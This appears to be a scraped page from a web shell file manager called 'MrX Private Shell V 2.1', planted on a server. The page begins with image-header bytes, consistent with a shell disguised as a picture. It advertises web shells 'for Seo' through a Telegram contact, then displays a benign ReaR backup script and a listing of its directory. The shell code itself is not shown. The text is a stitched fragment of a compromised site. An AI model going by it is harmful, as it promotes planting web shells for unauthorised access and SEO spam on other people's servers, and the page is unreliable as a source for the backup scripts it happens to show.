����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# prep/NETFS/default/040_inspect_configuration_files.sh
# Purpose of this script is to inspect configuration items which may change over time
# such as the BACKUP_PROG_OPTIONS variable that becomes an array in rear-2.3
# If the user defines in local.conf for example: BACKUP_PROG_OPTIONS="--option1 --option2" then you will see
# the following error message to turn your local setting into an array
[[ ${#BACKUP_PROG_OPTIONS[@]} -eq 1 && "$BACKUP_PROG_OPTIONS" == *\ * ]] && \
Error "The BACKUP_PROG_OPTIONS variable is now a Bash array and not a string. Please update your configuration to look like this:${IFS}BACKUP_PROG_OPTIONS+=( $BACKUP_PROG_OPTIONS )"
# We can add other checks below (in the future)
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 040_inspect_configuration_files.sh | File | 710 B | 0644 |
|
| 050_check_NETFS_requirements.sh | File | 4.31 KB | 0644 |
|
| 060_mount_NETFS_path.sh | File | 140 B | 0644 |
|
| 070_set_backup_archive.sh | File | 19.52 KB | 0644 |
|
| 090_check_encrypted_backup.sh | File | 140 B | 0644 |
|
| 100_check_nfs_version.sh | File | 1.18 KB | 0644 |
|
| 150_save_rsync_version.sh | File | 248 B | 0644 |
|
| 400_automatic_exclude_recreate.sh | File | 2.41 KB | 0644 |
|
| 980_umount_NETFS_dir.sh | File | 154 B | 0644 |
|